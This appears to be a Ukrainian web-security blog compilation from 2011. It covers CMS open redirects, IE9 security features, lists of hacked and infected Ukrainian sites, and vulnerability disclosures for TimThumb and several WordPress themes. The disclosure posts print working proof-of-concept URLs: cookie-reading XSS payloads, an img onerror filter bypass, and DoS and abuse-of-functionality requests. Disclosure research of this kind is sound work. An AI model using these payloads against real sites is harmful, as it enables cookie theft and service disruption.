Websecurity - Веб безпека

Продовжуючи тему редиректорів в CMS пропоную вам нову добірку редиректорів.

В даних записах я наводжу приклади редиректорів в різних CMS (та інших веб додатках). Дані уразливості можна виявити майже на всіх сайтах, що використовують зазначені системи.

Редиректори в CMS движках:

Pligg Content Management System:

• http://site/out.php?link=http://websecurity.com.ua

Вразливі лише старі версії Pligg CMS.

vBulletin (vbAnonymizer для vBulletin):

• http://domaintimes.net/forum/…?url=http://websecurity.com.ua

CMS WebManager-Pro:

• http://www.skypatrol.com.ua/…url=http://websecurity.com.ua

Продовжуючи розпочату традицію, після попереднього відео про приватність в Google Gmail, пропоную нове відео на веб секюріті тематику. Цього разу відео про приватні дані в Інтернеті. Рекомендую подивитися всім хто цікавиться цією темою.

Everyone Knows Your Name

Вже багато років я планував розповісти про це відео і ось нарешті дійшов до нього. Воно на тему приватності особистих даних, як і декілька останніх відео, про які я писав (і ця тема стає з кожним роком все більш актуальною). Це соціальна реклама на тему розповсюдження приватних даних в інтернеті.

В відео показані ризики приватності для людей, що розміщують особисті дані в Мережі (зокрема в соціальних мережах та на інших соціальних сайтах). В ньому закликається думати, що ви розміщуєте в онлайні. Рекомендую подивитися дане відео для розуміння ризиків приватності в Інтернеті.

В минулому місяці, 15.03.2011, компанія Microsoft випустила фінальну версію браузера Internet Explorer 9. Вихід нової версії відбувся через два роки після виходу IE8.

Розповім детальніше про IE9 та його покращення в плані безпеки.

Нові можливості інтерфейсу IE9 включають:

• Минималистичный інтерфейс заощаджує місце на екрані, дозволяючи бачити сайт, а не панелі браузера.
• Інтелектуальний адресний рядок з функцією One Box - це єдине поле для переходу до конкретного сайту чи для пошуку.
• Користувач може розміщати вкладки на одній панелі разом з адресним рядком, а може переносити їх на окремий рядок, забезпечуючи більше місця відкритим вкладкам.
• З функцією закріплення сайтів на панелі задач на улюблені сторінки можна зайти одним кликом, не відкриваючи попереднє вікно браузера.
• Списки переходів надають простий і швидкий спосіб переходу до окремої задачі веб-сайта, будь те створення поштового повідомлення, перевірка вхідних листів чи публікація коментарю.
• Поліпшена навігація по вкладках з функцією Windows Aero Snap.
• Розширена підтримка стандартів HTML5, SVG, CSS3, ECMAScript 5 і DOM.

Серед нових можливостей браузера для забезпечення безпеки та приватності в Мережі:

• На додаток до функцій InPrivate Browsing та InPrivate Filtering, доступним ще в Internet Explorer 8, Internet Explorer 9 підсилює захист конфіденційної інформації за допомогою технології “Захист від спостереження” (Tracking Protection). Завдяки їй користувач може вказувати, які дані про нього можуть бути передані сторонніми сайтам.
• Функція Hang Recovery. Нова можливість Internet Explorer 9 служить для обмеження наслідків зависання вкладки: якщо одна з вкладок перестає відповідати, інші вкладки і весь браузер продовжують роботу.
• Функція ActiveX Filtering. Технологія ActiveX дозволяє розробникам додатків створювати інтерактивний контент сайтів, але так само може становити небезпеку для користувацьких даних. Internet Explorer 9 дозволяє заблокувати можливості ActiveX для всіх сайтов, за винятком перевірених.
• Перегляд у режимі сумісності. Якщо браузер виявляє веб сайт, на якому не зазначений кращий режим відображення, в адресному рядку відображається кнопка перегляду в режимі сумісності.
• Автоматичне оновлення браузера.
• Підтримка групової політики.

По матеріалам http://www.thg.ru.

08.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Mimbo Pro для WordPress. Це комерційний шаблон для WP. Ця тема розроблена автором TimThumb, який і використовується в ній. Уразливості я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

14.04.2011

XSS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/mimbopro/

А також ще десятки php-скриптів шаблону в папці /mimbopro/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Уразливі Mimbo Pro 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив майже всі уразливості.

Серед цікавих векторів XSS атак, на які недостатньо звертають увагу веб розробники, є атаки на форми де використовуються різноманітні rich редактори (або коли веб розробники візуалізують дані в формах подібно до rich редакторів чи використовують AJAX). Cross-Site Scripting уразливості в таких формах можуть мати місце навіть при наявності фільтрації вхідних та віхідних даних.

До rich редакторів відносяться FCKeditor, CKEditor (це назва FCKeditor починаючи з третьої версії), TinyMCE та інші. Які додаються до форм, щоб надати користувачам можливості візульної обробки даних. А також подібні XSS уразливості можуть мати місце в веб додатках, що візуалізують контент.

Суть уразливості зводиться до того, що веб додаток (rich редактор або інший веб додаток) візуалізує отримані дані (вони можуть бути отримані від користувача, або з БД, куди вони були занесі так чи інакше від користувача). І навіть якщо у веб додатку є фільтрація вхідних і/або вихідних даних, коли спеціальні html символи замінюються на їхні сутності, це можна обійти і виконати XSS код. Для цього потрібно використати тег img та відповідний обробник (onerror чи onload).

За допомогою даного коду можна провести XSS атаку на подібні веб додатки. Тег img буде візуалізований в зображення і при цьому виконається код в браузері користувача:

<img src=’1′ onerror="javascript:alert(document.cookie)">

Про подібні уразливості я неодноразово писав за останні 4 роки: стосовно persistent XSS (в Relay та Drupal) та reflected XSS (в Relay, PHP-Nuke та Drupal). А також неодноразово зустрічав подібні дірки на різних сайтах. Враховуючи поширеність вищезгаданих веб додатків, дані уразливості стосуються мільйонів сайтів.

Продовжу своє дослідження безпеки e-commerce сайтів в Уанеті.

Веб сайти, що займаються електронною комерцією (e-commerce), повинні дбати про свою безпеку. Бо вони заробляють гроші на своїй онлайн діяльності і будь-які проблеми з безпекою на їх сайтах можуть їм коштувати фінансових втрат.

Але нажаль e-commerce сайти в Уанеті достатньо діряві, бо власники цих сайтів за безпекою особливо не слідкують.

В себе в новинах я писав про уразливості на наступних сайтах онлайн магазинів, обмінників електронних валют, веб брокерів та електронних платіжних систем (України та Росії):

• www.foxtrot.com.ua
• exwp.com
• www.prospero.ru та procontext.ru
• LiqPAY
• www.propage.ru

Також згадував про взломані онлайн магазини та e-commerce сайти в Уанеті:

• atta.zp.ua
• www.wm-change.in.ua
• www.x-change.in.ua
• www.pincode.biz.ua
• www.soundpress.biz
• shop.m-sport.com.ua
• kolight.org.ua
• www.luxuryhouse.com.ua
• www.be-be.com.ua
• domus.biz.ua
• shop.prodecoupage.com

А також згадував про інфіковані онлайн магазини та e-commerce сайти в Уанеті:

• belkosmetik.com.ua
• kupi-rashodniki.net
• kanduk.com.ua

Так що українським e-commerce сайтам (та сайтам інших країн) є куди покращувати свою безпеку.

07.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в TimThumb. Це веб додаток що використовується в темах для WordPress. А по суті дані уразливості я виявив ще 08.12.2008, коли я вперше стикнуся з thumb.php. Про що найближчим часом повідомлю розробникам.

Уразливими є TimThumb та всі веб додатки (зокрема теми для WordPress), що його використовують. Це такі шаблони як Live Wire Edition, The Gazette Edition, Live Wire 2.0 та Live Wire Style.

А також наступні комерційні шаблони: Bookclub, Fresh News, BoldNews, Placeholder, Biznizz, Auld, Listings, Elefolio, Chapters, Continuum, Diner, Skeptical, Caffeinated, Crisp, Sealight, Unite, Estate, The Morning After, Coda, Inspire, Apz, Spectrum, Diarise, Boast, Retreat, City Guide, Cinch, Slanted, Canvas, Postcard, Delegate, MyStream, Optimize, Backstage, SophisticatedFolio, Bueno, Digital Farm, Headlines, f0101, Royalle, Exposure, Therapy, Rockstar, Daily Edition, Object, Antisocial, Coffee Break, Mortar, Big Easy, Mainstream, Groovy Photo, Groovy Blog, Feature Pitch, Suit and Tie, The Journal, myweblog, Aperture, Meta-Morphosis, Bloggingstream, The Station, Groovy Video, Productum, Newsport, Irresistible, Cushy, WooTube, Foreword Thinking, Geometric, Abstract, Busy Bee, BlogTheme, Gotham News, THiCK, Typebased, Over Easy, Ambience, Snapshot, Open Air, Fresh Folio, Papercut, ProudFolio, VibrantCMS, Flash News, NewsPress, The Original Premium News та інші шаблони для WP. Уразливості в даних шаблонах аналогічні діркам в вищеназваних шаблонах.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

13.04.2011

Веб додаток може розміщуватися в файлі thumb.php або timthumb.php.

XSS:

http://site/path/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/path/thumb.php?src=http://
http://site/path/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/path/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality:

http://site/path/thumb.php?src=http://site&h=1&w=1
http://site/path/thumb.php?src=http://site.google.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS:

http://site/path/thumb.php?src=http://site/big_file&h=1&w=1

Уразливі TimThumb 1.24 та попередні версії (та теми для WP з цими версіями). XSS можлива лише в старих версіях програми. В версіях до 1.22 можлива AoF навіть з включеним обмеженням на домени через використання обхідної техніки. Також можна проводити DoS атаки, коли великий файл розміщенний на тому самому сайті, що і php-скрипт, або на дозволеному домені. Або якщо в скрипті дозволені зовнішні сайти, то тоді можна проводити AoF та DoS атаки. В версії TimThumb 1.25 уразливості переважно виправлені.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://umvs-kherson.gov.ua - інфікований державний сайт - інфекція була виявлена 03.04.2011. Зараз сайт входить до переліку підозрілих.
• http://ivaadm.gov.ua - інфікований державний сайт - інфекція була виявлена 18.03.2011. Зараз сайт не входить до переліку підозрілих.
• http://ironmensport.com - інфекція була виявлена 21.03.2011. Зараз сайт входить до переліку підозрілих.
• http://nano.com.ua - інфекція була виявлена 02.04.2011. Зараз сайт не входить до переліку підозрілих.
• http://dorama-teens.at.ua - інфекція була виявлена 26.02.2011. Зараз сайт не входить до переліку підозрілих.

05.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress. Це ще дві теми, що разом з Live Wire Edition входять до серії Live Wire. І вони також є комерційними шаблонами для WP від WooThemes. Які я виявив на одному сайті, що їх використовує. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі The Gazette Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам тем.

12.04.2011

XSS:

http://site/wp-content/themes/livewire/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/wp-content/themes/livewire/thumb.php?src=jpg
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire/

А також ще 30 php-скриптів шаблону в папці /livewire/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /livewire/, дані теми також можуть розміщуватися в папках /livewire-dev/ та /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).

Уразливі Live Wire 2.0 та Live Wire Style версія 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблонів. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Як і в попередні роки, надам свої прогнози розвитку веб безпеки в новому році. Але спочатку зроблю огляд тих прогнозів, що я давав на 2010 рік.

На початку минулого року я зробив свої прогнози стосовно розвитку галузі веб безпеки в минулому році. І зараз я оціню наскільки справдилися мої попередні прогнози.

1. Уразливості XSS в минулому році, як і раніше, все більше поширювалися (вони були найпоширенішими уразливостями веб додатків).
2. Збільшилися випадки витоків важливої інформації.
3. Активно знаходилися та використовувалися уразливості в браузерах для атак на користувачів.
4. Фішинги атаки проводилися достатньо активно на протязі минулого року. Що спонукало популярні сервіси почати більш наполегливо боротися проти фішінга та розповсюдження malware.
5. Значно зросла кількість заражених вірусами веб сторінок в Інтернеті. Зокрема в Уанеті в 2009 я виявив 65 інфікованих сайтів, а в 2010 вже 264 сайти (зростання на 294%).
6. Збільшилися атаки на соціальні мережі, в тому числі на Facebook та Twitter.
7. Значно зросла хакерська активність (зокрема в Уанеті зростання на 460%).

Як видно всі мої попередні прогнози переважно збулися .

А тепер мій прогноз розвитку галузі веб безпеки в 2011 році.

1. Уразливості XSS будуть поширюватися й надалі.
2. Все більше будуть використовуватися уразливості в браузерах та плагінах для атак на користувачів.
3. Збільшиться кількість атак на державні сайти України.
4. Розробники браузерів почнуть більш активно впроваджувати секюріті механізми в свої продукти.
5. Зростання кількості заражених вірусами веб сторінок буде більш активним.
6. Атаки на соціальні мережі продовжать збільшуватися.
7. Продовжиться подальше зростання хакерської активності.